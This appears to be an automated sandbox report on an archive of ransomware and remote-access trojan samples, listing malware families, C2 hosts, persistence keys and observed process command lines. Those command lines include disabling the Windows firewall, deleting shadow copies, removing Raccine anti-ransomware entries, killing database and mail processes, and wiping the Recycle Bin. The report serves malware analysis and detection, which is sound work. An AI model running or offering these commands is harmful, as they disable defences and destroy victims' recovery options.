Analysis Overview
SHA256
535956c43830655c6fa5bfd37c66ee1e46343533ebe43e7ae1818805b7270c06
Threat Level: Known bad
The file RNSM00460.7z was found to be: Known bad.
Malicious Activity Summary
Detect MafiaWare666 ransomware
RedLine
Quasar RAT
Conti Ransomware
Raccoon
njRAT/Bladabindi
SectopRAT
NullMixer
CyberGate, Rebhip
Raccoon Stealer V1 payload
Disables service(s)
MafiaWare666 Ransomware
Modifies WinLogon for persistence
BitRAT
NanoCore
Quasar payload
Crylock
RedLine payload
SectopRAT payload
Deletes shadow copies
Detected Nirsoft tools
Disables Task Manager via registry modification
Modifies Windows Firewall
Checks computer location settings
ASPack v2.12-2.42
Modifies file permissions
Reads user/profile data of web browsers
Executes dropped EXE
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
UPX packed file
Sets desktop wallpaper using registry
Launches sc.exe
System Network Configuration Discovery: Internet Connection Discovery
Program crash
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Runs ping.exe
Modifies registry class
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Scheduled Task/Job: Scheduled Task
Suspicious use of SetWindowsHookEx
Kills process with taskkill
Views/modifies file attributes
Checks SCSI registry key(s)
Modifies registry key
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-10-08 20:19
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-08 20:19
Reported
2024-10-08 20:21
Platform
win10v2004-20241007-en
Max time kernel
144s
Max time network
150s
Command Line
Signatures
BitRAT
Conti Ransomware
Crylock
CyberGate, Rebhip
Detect MafiaWare666 ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Disables service(s)
MafiaWare666 Ransomware
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "empty" | C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Encoder.gen-880823dd9df0ca6047cd829a1031e8a167ccec0629fdeac40a097dd555debf7c.exe | N/A |
NanoCore
NullMixer
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Raccoon
Raccoon Stealer V1 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
njRAT/Bladabindi
Deletes shadow copies
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Disables Task Manager via registry modification
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Gen.gen-3cb05ab0775975ad282e45b9b01a702c0896fa9ab1ac1e1c136ecfaf40fb7a6f.exe | N/A |
Executes dropped EXE
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NR = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\HEUR-Trojan-Ransom.MSIL.Gen.gen-c00db1eba5ba7fcd234c6a568ff9ae60bb3f343da199d0db8cd9b11308603a4d.exe\"" | C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Gen.gen-c00db1eba5ba7fcd234c6a568ff9ae60bb3f343da199d0db8cd9b11308603a4d.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | 8.tcp.ngrok.io | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | 8.tcp.ngrok.io | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | icanhazip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Desktop\Wallpaper | C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Encoder.gen-880823dd9df0ca6047cd829a1031e8a167ccec0629fdeac40a097dd555debf7c.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
Kills process with taskkill
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00460.7z
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00460.7z"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /1
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Blocker.gen-0531fa8add852becdab7c5235a9de90de117c0c6b06dcbcc58a397538e968f96.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-0531fa8add852becdab7c5235a9de90de117c0c6b06dcbcc58a397538e968f96.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Encoder.gen-4066d357b55fb66801389baf183151f514a74093f933750966557652f748aedb.exe
HEUR-Trojan-Ransom.MSIL.Encoder.gen-4066d357b55fb66801389baf183151f514a74093f933750966557652f748aedb.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Encoder.gen-880823dd9df0ca6047cd829a1031e8a167ccec0629fdeac40a097dd555debf7c.exe
HEUR-Trojan-Ransom.MSIL.Encoder.gen-880823dd9df0ca6047cd829a1031e8a167ccec0629fdeac40a097dd555debf7c.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Gen.gen-3cb05ab0775975ad282e45b9b01a702c0896fa9ab1ac1e1c136ecfaf40fb7a6f.exe
HEUR-Trojan-Ransom.MSIL.Gen.gen-3cb05ab0775975ad282e45b9b01a702c0896fa9ab1ac1e1c136ecfaf40fb7a6f.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Gen.gen-b6e7072f1cafe3fc7ddc0e2dbb1e40b997b3824d606572ead26c33fefb20f153.exe
HEUR-Trojan-Ransom.MSIL.Gen.gen-b6e7072f1cafe3fc7ddc0e2dbb1e40b997b3824d606572ead26c33fefb20f153.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Gen.gen-c00db1eba5ba7fcd234c6a568ff9ae60bb3f343da199d0db8cd9b11308603a4d.exe
HEUR-Trojan-Ransom.MSIL.Gen.gen-c00db1eba5ba7fcd234c6a568ff9ae60bb3f343da199d0db8cd9b11308603a4d.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe"
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Gen.gen-c432a01904467c55ef316fec2973f10e09f1a1053faf574683c5097174caaa38.exe
HEUR-Trojan-Ransom.MSIL.Gen.gen-c432a01904467c55ef316fec2973f10e09f1a1053faf574683c5097174caaa38.exe
C:\Users\Admin\AppData\Local\Temp\RSW.exe
"C:\Users\Admin\AppData\Local\Temp\RSW.exe"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe
HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Blocker.gen-a267e0d83b4ece8957283582de37e53a2d0d66938a29ca621592f5ccf0b416a8.exe
HEUR-Trojan-Ransom.Win32.Blocker.gen-a267e0d83b4ece8957283582de37e53a2d0d66938a29ca621592f5ccf0b416a8.exe
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /cnetsh firewall set opmode disable
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /cwscript.exe t.vbs preventchangedesktop.bat
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Blocker.gen-adf56d5514f9ff609943983010d3fc67ac0b29d5f92ac9adc25bafba79bad88a.exe
HEUR-Trojan-Ransom.Win32.Blocker.gen-adf56d5514f9ff609943983010d3fc67ac0b29d5f92ac9adc25bafba79bad88a.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\desktop.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\task.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windowdefender.vbs"
C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" user32.dll,UpdatePerUserSystemParameters
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Conti.gen-53b1c1b2f41a7fc300e97d036e57539453ff82001dd3f6abf07f4896b1f9ca22.exe
HEUR-Trojan-Ransom.Win32.Conti.gen-53b1c1b2f41a7fc300e97d036e57539453ff82001dd3f6abf07f4896b1f9ca22.exe
C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" user32.dll,UpdatePerUserSystemParameters
C:\Windows\SysWOW64\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
C:\Windows\system32\netsh.exe
netsh firewall set opmode disable
C:\Windows\system32\wscript.exe
wscript.exe t.vbs preventchangedesktop.bat
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Convagent.gen-e139a350242af220a379940c1a667891161ff92bdcdbb5acd024076a27ddbf56.exe
HEUR-Trojan-Ransom.Win32.Convagent.gen-e139a350242af220a379940c1a667891161ff92bdcdbb5acd024076a27ddbf56.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\preventchangedesktop.bat" "
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe *32
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{438E72CA-0AD1-4205-B4AB-45C1B61F2279}'" delete
C:\Windows\SysWOW64\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 conhost.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Convagent.gen-e139a350242af220a379940c1a667891161ff92bdcdbb5acd024076a27ddbf56.exe
HEUR-Trojan-Ransom.Win32.Convagent.gen-e139a350242af220a379940c1a667891161ff92bdcdbb5acd024076a27ddbf56.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-c1c40c13de318e8fa290dbb71c1b69be489b0d86abe65a39130e19d5b3eab28b.exe
HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-c1c40c13de318e8fa290dbb71c1b69be489b0d86abe65a39130e19d5b3eab28b.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 net.exe
C:\Windows\SysWOW64\reg.exe
"reg" delete HKCU\Software\Raccine /F
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 net1.exe
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{438E72CA-0AD1-4205-B4AB-45C1B61F2279}'" delete
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Foreign.gen-e742a50fc5dc16f9ac7ca253fce897b08ccbb2dcbf579f137d3e6adba61fc7c0.exe
HEUR-Trojan-Ransom.Win32.Foreign.gen-e742a50fc5dc16f9ac7ca253fce897b08ccbb2dcbf579f137d3e6adba61fc7c0.exe
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 ARP.EXE
C:\Windows\system32\reg.exe
REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallPaper /t REG_DWORD /d 1 /f
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 icacls.exe
C:\Windows\SysWOW64\sc.exe
"sc.exe" config Dnscache start= auto
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 cmd.exe
C:\Windows\SysWOW64\sc.exe
"sc.exe" config FDResPub start= auto
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SSDPSRV start= auto
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Generic-4a47769cf06cd353a24bf01392a154fb5c9c97547e63382d1859f6b90448b2ba.exe
HEUR-Trojan-Ransom.Win32.Generic-4a47769cf06cd353a24bf01392a154fb5c9c97547e63382d1859f6b90448b2ba.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Foreign.gen-e742a50fc5dc16f9ac7ca253fce897b08ccbb2dcbf579f137d3e6adba61fc7c0.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Foreign.gen-e742a50fc5dc16f9ac7ca253fce897b08ccbb2dcbf579f137d3e6adba61fc7c0.exe
C:\Windows\SysWOW64\sc.exe
"sc.exe" config upnphost start= auto
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2316 -ip 2316
C:\Windows\SysWOW64\explorer.exe
explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2316 -s 692
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe *32
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLWriter start= disabled
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SstpSvc start= disabled
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Generic-82a55487bd1c3b53eb0f0bee7483cae09792605e323b1df4b234582d21366d39.exe
HEUR-Trojan-Ransom.Win32.Generic-82a55487bd1c3b53eb0f0bee7483cae09792605e323b1df4b234582d21366d39.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 conhost.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM excel.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 net.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Generic-9862ba6b06253fd9343c9311bb00e28e97e86d426e6ccc83277f587e19517cd3.exe
HEUR-Trojan-Ransom.Win32.Generic-9862ba6b06253fd9343c9311bb00e28e97e86d426e6ccc83277f587e19517cd3.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 net1.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 ARP.EXE
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Generic-ac8e713b699fd019b67cbaca58cc35738e05b3308c5abda28656a3097cb4c672.exe
HEUR-Trojan-Ransom.Win32.Generic-ac8e713b699fd019b67cbaca58cc35738e05b3308c5abda28656a3097cb4c672.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Foreign.gen-e742a50fc5dc16f9ac7ca253fce897b08ccbb2dcbf579f137d3e6adba61fc7c0.exe
"C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Foreign.gen-e742a50fc5dc16f9ac7ca253fce897b08ccbb2dcbf579f137d3e6adba61fc7c0.exe"
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 icacls.exe
C:\Users\Admin\appdata\local\temp\svcgef.exe
"C:\Users\Admin\appdata\local\temp\svcgef.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "ping 0.0.0.0&del "C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Generic-4a47769cf06cd353a24bf01392a154fb5c9c97547e63382d1859f6b90448b2ba.exe""
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Generic-de649dbbac2165042cdbd659466f8b8e726cc0d085bfd627e564a440319efdea.exe
HEUR-Trojan-Ransom.Win32.Generic-de649dbbac2165042cdbd659466f8b8e726cc0d085bfd627e564a440319efdea.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 cmd.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Stop.gen-c64807b99c0f69113c15fbdbb6c52880c5c1df614eca08280ad294485bcf36d7.exe
HEUR-Trojan-Ransom.Win32.Stop.gen-c64807b99c0f69113c15fbdbb6c52880c5c1df614eca08280ad294485bcf36d7.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe *32
C:\Windows\install\MicroDate.exe
"C:\Windows\install\MicroDate.exe"
C:\Windows\SysWOW64\PING.EXE
ping 0.0.0.0
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 conhost.exe
